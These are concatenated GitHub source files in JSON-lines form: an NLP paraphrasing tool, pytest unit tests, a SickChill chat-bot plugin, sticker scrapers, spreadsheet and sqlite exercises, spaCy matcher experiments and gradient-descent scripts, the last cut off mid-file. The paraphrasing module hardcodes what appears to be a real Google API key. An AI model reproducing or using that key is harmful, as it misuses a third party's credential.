+{"seq_id":"20561624329","text":"import os\nfrom abc import ABC, abstractmethod\nimport json\nimport argparse\nimport re\nfrom collections import defaultdict\n\n\nimport requests\nimport logging\nfrom html import unescape as htmlue\nfrom nltk.translate.bleu_score import sentence_bleu\nfrom cat.simulation.nlg import common\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass AbstractParaphraser(ABC):\n ESCAPE_SYM = '#'\n ESCAPE_PATTERN = re.compile(f'{ESCAPE_SYM}([a-zA-Z_]*)')\n\n def __init__(self, name):\n self.name = name\n\n def paraphrase_file(self, input_path: str, output_path: str, compute_bleu=True):\n out_data = []\n with open(input_path, mode='r', encoding='utf-8') as sents_file:\n for line in sents_file.readlines():\n sent = line.strip('\\n').strip()\n logger.info(f'Input: {sent}')\n paraphrased = self.paraphrase_sentence(sent=sent)\n logger.info(f'Output: {paraphrased}')\n bleu = sentence_bleu([self._sent_to_tokens(paraphrased)],\n self._sent_to_tokens(sent)) if compute_bleu else None\n out_data.append({'input': sent, 'output': paraphrased, 'bleu': bleu})\n with open(output_path, mode='w', encoding='utf-8') as out_file:\n json.dump(out_data, out_file, indent=2)\n\n def _sent_to_tokens(self, sent, split_sym=' '):\n return sent.split(split_sym)\n\n def _escape_placeholders(self, sent: str) -> str:\n placeholders = common.get_template_placeholders(sent)\n escaped_placedholders = dict([(placeholder, f'{self.ESCAPE_SYM}{placeholder}') for placeholder in placeholders])\n return sent.format(**escaped_placedholders)\n\n def _unescape_placeholders(self, original: str, escaped: str) -> str:\n unescaped = self.ESCAPE_PATTERN.sub(r'{\\1}', escaped)\n tokenized = self._sent_to_tokens(unescaped)\n for i, token in enumerate(tokenized):\n if re.findall('{(.+?)}', token):\n lower_placeholder = token.lower()\n tokenized[i] = lower_placeholder\n unescaped = ' '.join(tokenized)\n original_ph = common.get_template_placeholders(original)\n new_ph = common.get_template_placeholders(unescaped)\n unknown_placeholders = set(new_ph) - set(original_ph)\n if len(unknown_placeholders) > 0:\n logger.error(f'Unknown placeholders {unknown_placeholders}')\n return None\n for ph in original_ph:\n if f'{{{ph}}}' not in unescaped:\n logger.error(f'Missing placeholder {{{ph}}} in back translation {unescaped}')\n return None\n return unescaped\n\n @abstractmethod\n def paraphrase_sentence(self, sent: str):\n pass\n\n @abstractmethod\n def paraphrase_word(self, token: str):\n pass\n\n\nclass PPDBParaphraser(AbstractParaphraser):\n PPDB_RAW = 'ppdb'\n PPDB_JSON = 'ppdb.json'\n\n def __init__(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n json_path = os.path.join(current_path, self.PPDB_JSON)\n if not os.path.exists(json_path):\n self._preprocess()\n with open(json_path, 'r') as f:\n self.paraphrases = json.load(f)\n AbstractParaphraser.__init__(self, 'ppdb')\n\n def _preprocess(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n raw_path = os.path.join(current_path, self.PPDB_RAW)\n ppdb_dict = defaultdict(list)\n with open(raw_path, 'r') as pp_file:\n for line in pp_file:\n columns = line.strip().split(' ||| ')\n if len(columns) < 6:\n continue\n if columns[5] != 'Equivalence':\n continue\n word = columns[1]\n paraphrase = columns[2]\n if paraphrase not in ppdb_dict[word]:\n ppdb_dict[word].append(paraphrase)\n dump_path = os.path.join(current_path, self.PPDB_JSON)\n with open(self.PPDB_JSON, 'w') as out_file:\n json.dump(ppdb_dict, 
out_file, sort_keys=True)\n\n def paraphrase_sentence(self, sent: str):\n paraphrased = []\n for word in self._sent_to_tokens(sent):\n paraphrase = self.paraphrase_word(word)\n paraphrased.append(paraphrase)\n return ' '.join(paraphrased)\n\n def paraphrase_word(self, token: str):\n possibilities = self.paraphrases.get(token, [])\n if len(possibilities) == 0:\n return token\n return possibilities[0] # random.choice(possibilities)\n\n\nclass AbstractPivotParaphraser(AbstractParaphraser, ABC):\n def __init__(self, name):\n AbstractParaphraser.__init__(self, name)\n\n\nclass GooglePivotParaphraser(AbstractPivotParaphraser):\n URL = 'https://translation.googleapis.com/language/translate/v2'\n API_KEY = 'AIzaSyA2AhHSZ5qCf-aJEPXczK2n2lMpS3Amlis'\n\n def __init__(self, languages):\n self.languages = languages\n AbstractPivotParaphraser.__init__(self, 'google')\n\n def paraphrase_sentence(self, sent: str) -> str:\n translation = self._multi_translation(sent, self.languages)\n return translation\n\n def paraphrase_word(self, word: str) -> str:\n translation = self._multi_translation(word, self.languages)\n return translation\n\n def _multi_translation(self, text: str, languages=['en', 'de', 'fr', 'zh-CN', 'en']) -> str:\n if len(set(languages)) < 2:\n raise Exception('Need at least one intermediate language for pivot paraphrasing but got ' + languages)\n base = self._escape_placeholders(text)\n translation = base\n for i in range(len(languages) - 1):\n src_lang = languages[i]\n target_lang = languages[i + 1]\n translation = self._query_translation(text=translation, source=src_lang, target=target_lang)\n return self._unescape_placeholders(text, translation)\n\n def _query_translation(self, text: str, source: str = 'en', target='de') -> str:\n params = {'q': text, 'source': source, 'target': target, 'key': self.API_KEY}\n r = requests.post(url=self.URL, data=params)\n if r.status_code == 403:\n return self._query_translation(text, source, target)\n response = json.loads(htmlue(r.text))\n translations = response.get('data', {}).get('translations', [])\n return [translation.get('translatedText', text) for translation in translations][0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--query', type=str,\n help='Input query to paraphrase. Can contain escaped characters in curly brackets')\n parser.add_argument('-i', '--in_file', type=str, help='Line separated list of queries')\n parser.add_argument('-o', '--out_file', type=str, help='Output file to write json to')\n parser.add_argument('-l', '--languages', type=str, nargs='*',\n help='The languages to use for pivot translation. First languages is appended as target automatically. Language abbreviations are not validated')\n parser.add_argument('-b', '--bleu', type=bool, default=True, help='Wether to compute and log the BLEU score')\n parser.add_argument('-p', '--paraphraser', default='g',\n help='Type of paraphraser. 
\"g\" for Google Translate API, \"p\" for PPDB paraphraser')\n args = parser.parse_args()\n\n query = args.query\n in_file = args.in_file\n if query and in_file:\n logger.error('Can either specify query or input file to paraphrase')\n exit(1)\n if not (query or in_file):\n logger.error('Must either specify query or input file to paraphrase')\n exit(1)\n if args.in_file and not args.out_file:\n logger.error(f'Missing argument \"-o\"/\"--out_file\" for file paraphrasation')\n exit(1)\n\n languages = []\n paraphrase_type = args.paraphraser\n if paraphrase_type == 'p':\n p = PPDBParaphraser()\n elif not paraphrase_type == 'g':\n logger.warning(f'Unknown paraphraser type \"{paraphrase_type}\", using default paraphraser \"g\"')\n paraphrase_type = 'g'\n if paraphrase_type == 'g':\n languages = args.languages\n if not languages or len(set(languages)) < 2:\n logger.error('At least two languages required for pivot paraphrasing')\n exit(1)\n if not languages[0] == languages[-1]:\n languages.append(languages[0])\n p = GooglePivotParaphraser(languages=languages)\n\n if query:\n logger.info(f'Input Sentence: {query}')\n paraphrase = p.paraphrase_sentence(query)\n logger.info(f'Output Sentence: {paraphrase}')\n else:\n p.paraphrase_file(input_path=in_file, output_path=args.out_file, compute_bleu=args.bleu)\n","repo_name":"DataManagementLab/CAT","sub_path":"cat/simulation/nlg/paraphrasing.py","file_name":"paraphrasing.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70640602727","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"Unit tests for pypytextable.\"\"\"\n\nimport pytest\n\nfrom pytextable import _pytextable\n\n\ndef test_wrap_tex_environment():\n text = \"My custom text\"\n expected = f\"\\\\begin{{center}}\\n {text}\\n\\\\end{{center}}\\n\"\n assert _pytextable._wrap_tex_environment(\"center\", text) == expected\n\n\ndef test_wrap_tex_environment_cmd():\n text = \"My custom text\"\n cmd = \"lll\"\n expected = f\"\\\\begin{{tabular}}{{{cmd}}}\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert _pytextable._wrap_tex_environment(\"tabular\", text, cmd=cmd) == expected\n\n\ndef test_wrap_tex_environment_options():\n text = \"My custom text\"\n options = \"lll\"\n expected = f\"\\\\begin{{tabular}}[{options}]\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert (\n _pytextable._wrap_tex_environment(\"tabular\", text, options=options) == expected\n )\n\n\n@pytest.mark.parametrize(\"data\", [[[1, 2]], [[1, 2, 3]]])\ndef test_n_columns(data):\n assert len(data[0]) == _pytextable._get_num_columns(data)\n\n\ndef test_fail_columns():\n data = [\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3, 4),\n ]\n with pytest.raises(ValueError, match=\"All rows must have the same number\"):\n _pytextable._get_num_columns(data)\n\n\n@pytest.mark.parametrize(\n \"alignment, n_columns, expected\",\n (\n (\"l\", 3, \"lll\"),\n (\"r\", 2, \"rr\"),\n (\"c\", 4, \"cccc\"),\n (\"l|\", 3, \"l|l|l\"),\n (\"|l|\", 3, \"|l|l|l|\"),\n (\"\", 3, \"ccc\"),\n (\"llc\", 3, \"llc\"),\n (\"|ll|l|\", 3, \"|ll|l|\"),\n ),\n)\ndef test_table_alignment(alignment, n_columns, expected):\n assert _pytextable._table_alignment(alignment, n_columns) == expected\n\n\ndef test_fail_table_alignment_chars():\n with pytest.raises(ValueError, match=\"Invalid alignment\"):\n _pytextable._table_alignment(\"llb\", 3)\n\n\ndef test_fail_table_alignment_n_separators():\n with pytest.raises(ValueError, match=\"Too many |\"):\n _pytextable._table_alignment(\"|l|||\", 3)\n\n\n@pytest.mark.parametrize(\"alignment\", (\"ll\", \"llll\"))\ndef test_fail_table_alignment_n_chars(alignment):\n with pytest.raises(ValueError, match=\"Number of alignment\"):\n _pytextable._table_alignment(alignment, 3)\n","repo_name":"karlch/pytextable","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6641385426","text":"import requests\nimport json\nimport urllib\n\n\nclass sickChill(object):\n\n def __init__(self, couchURL, apikey, whitelistedusers):\n self.sickURL = couchURL\n self.apiKey = apikey\n self.users = whitelistedusers\n\n def begin(self, command, user):\n # make the command lower for all functions\n command = command.lower()\n response = None\n needs_help = False\n if user not in self.users:\n return \"This function is currently only avaliable to contributors to say thanks\"\n if 'tv today' in command:\n return self.getToday()\n elif 'tv latest' in command:\n return self.getLatest()\n elif 'tv search' in command:\n return self.getSearch(command.replace(\"tv search\", \"\"))\n elif 'tv download' in command:\n return self.getDownload(command.replace(\"tv download\", \"\"))\n elif command[-1] == '?':\n return \"No.\", False\n else:\n return \"Invalid Command\", False\n\n def getDownload(self, searchstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n download = sick.downloadTvShow(searchstr)\n if download == \"An existing indexerid already exists in database\":\n return \"Tv Show allready added\", False\n elif \"could not be parsed into\" in download:\n return \"Tv Show ID invalid, Full Error: \" + download, False\n elif \"queued to be added\" in download:\n return \"Success: \" + download + \"\\n *WARNING: This will only add future episodes, contact steve to add past episodes*\", False\n return download, False\n\n def getSearch(self, seachstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvshows = sick.searchTvShows(seachstr)\n if tvshows == \"Empty\":\n return \"No tvshows found\", False\n showlist = []\n for show in tvshows:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"name\"], \"value\": \"*First Aired:* \" + show[\"first_aired\"] + \"\\n*Allready added:* \" + show[\"in_show_list\"] + \"\\n*ShowID:* \" + str(show[\"id\"])})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getToday(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n if tvtoday == \"Empty\":\n return \"No shows airing today\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getLatest(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n tvlatest = sick.Latest()\n if tvtoday == \"Empty\":\n tvtoday = []\n if tvlatest == \"Empty\":\n tvlatest = []\n if len(tvlatest) == 0 & len(tvtoday) == 0:\n return \"Now shows in the next 7 days\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Todays Shows\", \"fields\": fields})\n for show in tvlatest:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + 
show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Next 7 days shows\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n\nclass sickChillAPI:\n\n def __init__(self, url, apikey):\n self.rooturl = url\n self.apikey = apikey\n\n def Today(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=today'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"today\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"today\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def Latest(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=soon'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"soon\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"soon\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def searchTvShows(self, search):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=sb.searchindexers&only_new=0&name=' + search\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"results\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"results\"]:\n ishow = {}\n ishow[\"first_aired\"] = show[\"first_aired\"]\n if show[\"in_show_list\"] is True:\n ishow[\"in_show_list\"] = \"Yes\"\n else:\n ishow[\"in_show_list\"] = \"No\"\n ishow[\"name\"] = show[\"name\"]\n ishow[\"id\"] = show[\"tvdbid\"]\n shows.append(ishow)\n return shows\n\n def downloadTvShow(self, id):\n url = self.rooturl + '/api/' + self.apikey + \"?cmd=show.addnew&indexerid=268592&status=ignored&tvdbid=\" + id\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return json_data[\"message\"]\n elif json_data[\"result\"] == \"success\":\n return json_data[\"message\"]\n","repo_name":"OneLogicalMyth/monkey-bot","sub_path":"plugins/sickPotatoBot.py","file_name":"sickPotatoBot.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"6353681747","text":"import typing\n\nfrom sticker_parser.api import API\nfrom sticker_parser.models import StickerPack\n\n\nasync def get_section_sticker_packs(api: API, section_id: str, next_from: str = None) -> typing.List[dict]:\n packs = []\n data = api.send_api_request(\"catalog.getSection\", {\"section_id\": section_id, \"start_from\": next_from})\n if 'next_from' in data['response']['section'] and data['response']['section']['next_from']:\n packs += await get_section_sticker_packs(api, section_id, data['response']['section']['next_from'])\n return packs + list(map(lambda x: x[1], data['response']['stickers_packs'].items()))\n\n\nasync def get_all_sticker_packs(api: API) -> typing.List[dict]:\n packs = []\n sections = api.send_api_request(\"catalog.getStickers\", {\"need_blocks\": 0})\n for section in sections['response']['catalog']['sections']:\n packs += await get_section_sticker_packs(api, section['id'])\n\n unique_packs = []\n packs_ids = []\n\n for pack in packs:\n if pack['product']['id'] in packs_ids:\n continue\n packs_ids.append(pack['product']['id'])\n unique_packs.append(pack)\n return sorted(unique_packs, key=lambda x: x['product']['id'])\n\n\nasync def get_all_stickers(api: API, sticker_packs: typing.List[dict]) -> typing.List[dict]:\n keywords = api.send_api_request(\"store.getStickersKeywords\", {\n \"aliases\": 1,\n \"all_products\": 1,\n \"need_stickers\": 0\n })\n stickers = []\n for sticker_pack in sticker_packs:\n stickers += [\n {**sticker, \"product_id\": sticker_pack['product']['id']}\n for sticker in sticker_pack['product']['stickers']\n ]\n for dictionary in keywords['response']['dictionary']:\n for sticker in dictionary['stickers']:\n for index in range(len(stickers)):\n if stickers[index]['sticker_id'] == sticker['sticker_id']:\n stickers[index]['keywords'] = dictionary['words']\n break\n\n return stickers\n\n\nasync def collect_user_stickers(api: API, user_id: int) -> typing.List[dict]:\n gifts = api.send_api_request(\"gifts.getCatalog\", {\n \"no_inapp\": 0,\n \"user_id\": user_id,\n \"force_payment\": 1\n })\n stickers_gifts = [s for s in gifts['response'] if s['name'] in {'stickers_popular', 'stickers'}]\n stickers = []\n for sticker_gift in stickers_gifts:\n stickers += [item for item in sticker_gift['items'] if item.get('disabled', False)]\n stickers_ids = set([s['gift']['stickers_product_id'] for s in stickers])\n return [await sticker_pack.dict() async for sticker_pack in StickerPack.filter(id__in=stickers_ids)]\n\n\n\n","repo_name":"lordralinc/sticker_parser","sub_path":"sticker_parser/collectors.py","file_name":"collectors.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23897705727","text":"#pip means preffered installer programmer\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nworksheet.write('A1','Hello')\r\nworksheet.write('A2','welcome')\r\nworksheet.write('A3','xlsxwriter')\r\nworksheet.write('A4','module')\r\nworkbook.close()\r\n\r\nprint(\"^^^^^^^^^^^^^^\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=['Gana' ,\"Vikas\", 'Anant']\r\nfor i in l:\r\n worksheet.write(r,c,i)\r\n r +=1\r\nworkbook.close()\r\nprint(\"&&&&&&&\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=[['Gana',30000] ,[\"Vikas\",29000], ['Anant',30000]]\r\nfor i in l:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\n r +=1\r\n c=0\r\nworkbook.close()\r\n\r\nprint(\"%%%%%%%%\")\r\n\r\n\r\n\r\n'''import sqlite3\r\nconn=sqlite3.connect('example.db')\r\nname=input(\"Enter name:\")\r\ncursor=conn.cursor()\r\n\r\n\r\ntry:\r\n cursor.execute(\"INSERT INTO employee (name) VALUES (?)\",(name, ))\r\n conn.commit()\r\n print(\"'%d' record inserted\" %(cursor.rowcount))\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()'''\r\n\r\n\r\nimport sqlite3\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('demo1.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Data\")\r\nconn=sqlite3.connect('example.db')\r\ncursor=conn.cursor()\r\nr=c=0\r\n\r\ntry:\r\n cursor.execute(\"\"\"select * from employee\"\"\")\r\n d=cursor.fetchall()\r\n for i in d:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"day 29 last day.py","file_name":"day 29 last day.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75297901928","text":"import os\nimport pickle\n\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nimport src.utils as utils\n\n\nclass Estimator:\n def __init__(\n self, src_dir, dst_dir,\n est_file, cls_file, drs_file, srs_file, input_size):\n self.src_dir = src_dir\n self.dst_dir = dst_dir\n self.est_file = est_file\n self.cls_file = cls_file\n self.drs_file = drs_file\n self.srs_file = srs_file\n self.input_size = input_size\n\n def execute(self):\n estimator = load_model(self.est_file)\n\n with open(self.cls_file, 'rb') as f:\n cls_info = pickle.load(f)\n\n pred_labels, true_labels, output = [], [], []\n\n for subdir in os.listdir(self.src_dir):\n for f in os.listdir(os.path.join(self.src_dir, subdir)):\n filename = os.path.join(self.src_dir, subdir, f)\n img = utils.load_target_image(filename, self.input_size)\n pred_class = np.argmax(estimator.predict(img))\n pred_label = cls_info[pred_class]\n pred_labels.append(pred_label)\n\n true_label = subdir\n true_labels.append(true_label)\n\n output.append(f'{filename} -> {pred_label}')\n\n report = classification_report(true_labels, pred_labels)\n labels = list(cls_info.values())\n cnfmtx = confusion_matrix(true_labels, pred_labels, labels)\n cm = pd.DataFrame(cnfmtx, index=labels, columns=labels)\n\n utils.mkdir(self.dst_dir, rm=True)\n with open(self.drs_file, 'w') as f:\n f.writelines(output)\n\n with open(self.srs_file, 'w') as f:\n f.write(report)\n f.write('¥n¥n')\n f.write(str(cm))\n f.write('¥n')\n","repo_name":"fyk7/keras_image_cookiecutter","sub_path":"src/models/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7923364042","text":"import spacy \nfrom spacy.matcher import Matcher\nimport json\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nmatcher = Matcher(nlp.vocab)\npattern = [\n {\"LIKE_EMAIL\":True}\n]\nmatcher.add(\"EMAIL_ADDRESS\", [pattern])\n\ndoc = nlp(\"Thsi is email address : abc@winner.com\")\nmatches = matcher(doc)\n# print(matches)\n\n# matches[0][0] is a lexeme\n# print(f'Label = {nlp.vocab[matches[0][0]].text}')\n\nwith open (\"data\\wiki_mlk.txt\", \"r\") as f:\n text = f.read()\n\n#grabing all proper noun followed with verb\nmatcher2 = Matcher(nlp.vocab)\npattern2 = [\n {\"POS\":\"PROPN\", \"OP\":\"+\"}, {\"POS\":'VERB'}\n # {\"IS_ALPHA\": True}, {\"IS_DIGIT\": True, \"OP\": \"+\"}\n]\nmatcher2.add(\"PROPER_NOUNS\",[pattern2], greedy='LONGEST')\ndoc2 = nlp(text)\nmatches2 = matcher2(doc2)\n# print(len(matches2))\nmatches2.sort(key=lambda x : x[1])\n# for match in matches2[:10]:\n# print(match, doc2[match[1]:match[2]])\n\n\n\n#grabbing speaker name who said the quote\n\nwith open(\"data/alice.json\",'r') as f:\n # for json file replace \\ -> / тнР\n data = json.load(f)\ntext3 = data[0][2][0]\ntext3 = text3.replace(\"`\",\"'\")\nprint(text3)\n\nspeak_lemmas = [\"think\", \"say\", \"tell\"]\n\nmatcher3 = Matcher(nlp.vocab)\npattern3 = [\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"},\n {\"POS\":'VERB', \"LEMMA\":{'IN': speak_lemmas}},\n {\"POS\":\"PROPN\", \"OP\":\"+\"},\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"}\n]\npattern4 = [{'ORTH': \"'\"},\n {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"}, {'ORTH': \"'\"},\n {\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {\"POS\": \"PROPN\", \"OP\": \"+\"}\n ]\npattern5 = [{\"POS\": \"PROPN\", \"OP\": \"+\"},\n{\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {'ORTH': \"'\"}, {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"},\n {'ORTH': \"'\"}\n ]\nmatcher3.add(\"PROPER_NOUNS\",[pattern3, pattern4, pattern5], greedy='LONGEST')\ndoc3 = nlp(text3)\nmatches3 = matcher3(doc3)\nprint(len(matches3))\nmatches3.sort(key=lambda x : x[1])\nfor match in matches3[:10]:\n print(match, doc3[match[1]:match[2]])","repo_name":"jigarsiddhpura/NLPwithSpacy","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10745994553","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\ndef grad_w(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx) * x\r\n\r\ndef grad_b(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx)\r\n\r\ndef loss(w,b):\r\n\terror = 0\r\n\tfor x,y in zip(X,Y):\r\n\t\tfx = f(w,b,x)\r\n\t\terror += 0.5 * (fx - y) ** 2\r\n\t\treturn error\r\n\r\n\r\nfilename = 'data.csv'\r\ndf = pd.read_csv(filename)\r\nX = df ['x']\r\nY = df ['y']\r\n\r\ninit_w,init_b=1,1\r\nw_b_dw_db = [(init_w,init_b,0,0)]\r\nw_history,b_history,error_history,losshistory=[],[],[],[]\r\nw,b,eta,mini_batch_size,num_points_seen = init_w,init_b,0.01,10,0 \r\nm_w,m_b,v_w,v_b,eps,beta1,beta2,max_epochs=0,0,0,0,1e-8,0.9,0.99,1000\r\n\r\nfor i in range (max_epochs):\r\n\tdw,db = 0,0\r\n\tfor x,y in zip(X,Y):\r\n\t\tdw+= grad_w(w,b,x,y)\r\n\t\tdb+= grad_b(w,b,x,y)\r\n\t\t\r\n\tm_w = beta1 * m_w + (1 - beta1) * dw\r\n\tm_b = beta1 * m_b + (1 - beta1) * db\r\n\t\t\r\n\tv_w = beta2 * v_w + (1 - beta2) * dw ** 2\r\n\tv_b = beta2 * v_b + (1 - beta2) * db ** 2\r\n\t\t\r\n\tm_w_hat = m_w / (1 - math.pow(beta1,i+1))\r\n\tm_b_hat = m_b / (1 - math.pow(beta1,i+1))\r\n\t\t\r\n\tv_w_hat = v_w / (1 - math.pow(beta2,i+1))\r\n\tv_b_hat = v_b / (1 - math.pow(beta2,i+1))\r\n\t\t\r\n\tw = w - (eta / np.sqrt(v_w_hat + eps))* m_w_hat\r\n\tb = b - (eta / np.sqrt(v_b_hat + eps)) * m_b_hat \r\n\tr = loss(w,b)\r\n\tprint (r)\r\n\tlosshistory.append(r)\r\n\tplt.plot(losshistory)\r\n\t\r\nplt.show()\r\n\r\n\t\t\r\n\t\t\t\r\n\r\n\t\r\n\r\n\r\n\t\r\n\r\n\t\r\n","repo_name":"princeamitlali/gradient_descent","sub_path":"adamgradientdescent.py","file_name":"adamgradientdescent.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15034551158","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef extend_matrix(X):\n return np.c_[np.ones((X.shape[0], 1)), X]\n\ndef normal_eq(Xe, y):\n return np.linalg.inv(Xe.T.dot(Xe)).dot(Xe.T).dot(y)\n\ndef normalize(x_to_norm, X):\n return (x_to_norm - np.mean(X, axis=0, dtype=np.float64)) / np.std(X, axis=0, dtype=np.float64)\n\ndef cost(Xe, y, beta):\n j = np.dot(Xe, beta)-y\n return (j.T.dot(j))/Xe.shape[0]\n\n# def gradient_descent(X, y, a = 0.0002, n = 20000000):\ndef gradient_descent(X, y, a = 0.01, n = 1000, plot = False):\n \"\"\"Perform gradient descent on the given X\"\"\"\n w = np.zeros(X.shape[1])\n costs = []\n for i in range(n):\n j = (X.T).dot(X.dot(w) - y)\n w = w - (a * j) / X.shape[0]\n costs.append(cost(X, y, w))\n if plot:\n plt.figure()\n plt.plot(range(n), costs)\n return w\n\n\ndef main():\n data = np.loadtxt(\"A2_datasets_2022/girls_height.csv\")\n\n X = data[:, 1:3]\n y = data[:, 0]\n\n plt.figure(\"Girl, mom\")\n plt.scatter(X[:, 0], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n plt.xlabel(\"mom height\")\n plt.ylabel(\"girl height\")\n\n plt.figure(\"Girl, dad\")\n plt.xlabel(\"dad height\")\n 